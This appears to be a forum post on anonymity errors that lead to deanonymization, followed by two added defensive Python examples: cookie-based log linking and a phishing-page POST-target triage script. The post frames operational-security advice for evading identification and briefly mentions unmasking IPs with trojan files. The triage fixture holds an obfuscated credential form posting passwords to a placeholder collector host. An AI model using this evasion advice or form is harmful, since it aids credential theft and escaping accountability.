Anonymity Errors leading to Deanon.


Fixxx


Many people who ask such questions are too focused on changing their IP and completely forget about much more important things. From personal experience, I know of a case where a fairly experienced hacker used VPNs, disposable emails and threw money through a chain of payment systems. He was trying hard enough, but he got caught. The point is not that you shouldn't try to hide your IP address - the point is that it's absolutely pointless if you don't understand other aspects of anonymity.


1. Anonymity in social networks

If you registered on Facebook with your phone number and afterwards connect via Tor...

❓ Does this mean you are anonymous - because you used Tor?
❌ No, it doesn't. If only because you have a real phone number attached to your account. Accordingly, an IP address is not particularly necessary for your identification.


2. Anonymity and cookies

Cookies are small pieces of information that are stored in your web browser after a website has sent them to you.

❌ If you visit a website, receive your cookies, then reconnect via Tor and write something in the comments, the cookie can link the author of the comment and the user who previously visited with a different IP address.
⚠️ Cookies are designed to identify a user independently of your IP address.


3. Many sites store the IP of previous activities

For example, you have registered a VPN account to which you will connect via Tor. But you registered it from your IP.

❓ Will you be anonymous if you connect to a VPN through Tor?
❌ No, because information about previous operations with your IP address has already been stored.


4. I will buy a VPN (or a VPS server to set up OpenVPN) and be anonymous

⚠️ Even if you read the third point and register via Tor, but at the same time use wallets that can lead to you, anonymity is out of the question.
⚠️ And when buying disposable SIM cards and logging in to wallet sites, you should also remember about your anonymity, otherwise it's all just pointless.


5. OpenVPN is good, but not for anonymity

If you think about the original purpose of VPNs, they are virtual private networks within which computers scattered around the world can access each other's local network resources. The traffic exchange is encrypted, but only against an external observer, not against the server and clients of the OpenVPN network. For this reason, if you use a free or paid VPN account, be prepared for the server owner to do whatever he wants with your traffic and to keep activity logs of which requests were made from which client. It's impossible to say how many of them are “honeypots” and record activity, but in my opinion, 100% of paid and free VPN providers do this.

✅ If you want to use a VPN - use one, but your own.

6. There are many ways to find out your real IP address

There are a lot of options. From the simplest - send a link to a controlled site and see the IP (if communicating through an anonymous messenger) or a file with a trojan to quite sophisticated ways.

7. If you use any closed-source software, there is a backdoor installed there

Backdoors can be in legitimate closed-source software as well - as a hard-to-detect vulnerability that the vendor knows about, or just a regular dumb-as-a-cork backdoor - such backdoors have been found, for example, in official router firmware. As for illegal closed-source software that is distributed anonymously, please tell me, why not install a backdoor? The owner won't find out - and even if he does, what will he do? He will go to the police and say: I bought scripts for cracking the security of stolen phones and they installed a virus there... I doubt he will do that.


8. Lack of understanding of the simplest technical aspects of networks, servers, applications, etc.

Phishing sites of some uneducated "hackers" can be easily found simply by analyzing where the POST request goes.

❓ Why did the "hacker" leave the archived scripts on this site? Apparently, he just didn't know that it is very easy to track where the POST request goes even if the HTML code is obfuscated.
⚠️ And there can be many such "technical" blunders: a simple SSH connection password, misunderstanding what information on the server a researcher can access, misunderstanding what Cloudflare is for, etc.


9. Big picture

Example: infrastructure is attacked and IP traces and other indirect signs lead somewhere far away. But at the same time, the objects and methods of attack are similar to those used by a known hacker group.

⚠️ At the very least, there is reason to wonder.


10. Metadata in files

You should know all about metadata and programs for viewing and cleaning it.
❌ Otherwise, if you are distributing files, all other measures of anonymity may be useless. This is similar to the first point, where you use Tor but log in to a social network using your own account.


What should I do to make sure I won't be found?

The only 100% guarantee is the fact that you will not be found... Even if you have studied the "anonymity manuals" from cover to cover, even if they were written by a knowledgeable person and even if you have done everything correctly, but don't understand the other aspects discussed above, your chances of getting "burned" by one of the idiotic methods discussed above are quite high.
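
Point 2 from the site operator's side, as an added example that is not part of the original post: grouping access-log entries by session cookie shows the same visitor behind two different addresses. The log format, the cookie name `sid` and every address in it are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed access-log lines (documentation IP ranges); "sid" is an assumed cookie name.
SAMPLE_LOG = """\
198.51.100.23 [15/Jun/2025:10:01:12 +0000] "GET /article/42 HTTP/1.1" 200 "sid=a81f3c"
198.51.100.23 [15/Jun/2025:10:02:40 +0000] "GET /article/43 HTTP/1.1" 200 "sid=a81f3c"
203.0.113.77 [15/Jun/2025:10:09:05 +0000] "POST /article/42/comment HTTP/1.1" 302 "sid=a81f3c"
192.0.2.10 [15/Jun/2025:10:11:30 +0000] "GET /article/42 HTTP/1.1" 200 "sid=77b0de"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<cookies>[^"]*)"$'
)

def parse_cookies(header):
    """Split a Cookie header value into a name -> value dict."""
    pairs = (item.split("=", 1) for item in header.split(";") if "=" in item)
    return {name.strip(): value.strip() for name, value in pairs}

def link_by_cookie(log_text, cookie_name="sid"):
    """Group requests by cookie value; return only cookies seen from more than one IP."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        sid = parse_cookies(m["cookies"]).get(cookie_name)
        if sid:
            seen[sid].append((m["ts"], m["ip"], m["method"], m["path"]))
    return {sid: events for sid, events in seen.items()
            if len({ip for _, ip, _, _ in events}) > 1}

if __name__ == "__main__":
    for sid, events in link_by_cookie(SAMPLE_LOG).items():
        print(f"cookie {sid} seen from multiple addresses:")
        for ts, ip, method, path in events:
            print(f"  {ts}  {ip:15}  {method} {path}")
```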
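
Point 8 from an analyst's side, as an added example that is not part of the original post: a triage script that lists where each form on a saved phishing page submits its POST, including forms hidden behind one layer of `document.write(unescape(...))`. The sample page, hostnames and function names are constructed; other obfuscation schemes are not handled.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urljoin, urlsplit

# Constructed sample: a credential form hidden behind one layer of
# document.write(unescape(...)); all hostnames are placeholders.
PAGE_URL = "https://login.example.test/secure/index.html"
SAMPLE_HTML = """<html><body><script>
document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22https%3A//collector.example.net/save.php%22%3E%3Cinput%20name%3D%22user%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22pass%22%3E%3C/form%3E'));
</script>
<form method="POST" action="../search.php"><input name="q"></form>
</body></html>"""

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)

class FormCollector(HTMLParser):
    """Record each <form> with its method, action and input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"method": (a.get("method") or "get").lower(),
                               "action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name"), a.get("type") or "text"))

def post_targets(html, page_url):
    """Return POST forms with absolute action URLs and a cross-host flag."""
    # Append markup recovered from unescape('...') string literals (one layer only).
    decoded = "".join(unquote(m.group(2)) for m in UNESCAPE_RE.finditer(html))
    collector = FormCollector()
    collector.feed(html + decoded)
    page_host = urlsplit(page_url).hostname
    out = []
    for form in collector.forms:
        if form["method"] != "post":
            continue
        target = urljoin(page_url, form["action"])
        out.append({"target": target, "fields": form["fields"],
                    "cross_host": urlsplit(target).hostname != page_host})
    return out

if __name__ == "__main__":
    for f in post_targets(SAMPLE_HTML, PAGE_URL):
        print(f["target"], "cross-host" if f["cross_host"] else "same-host", f["fields"])
```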
 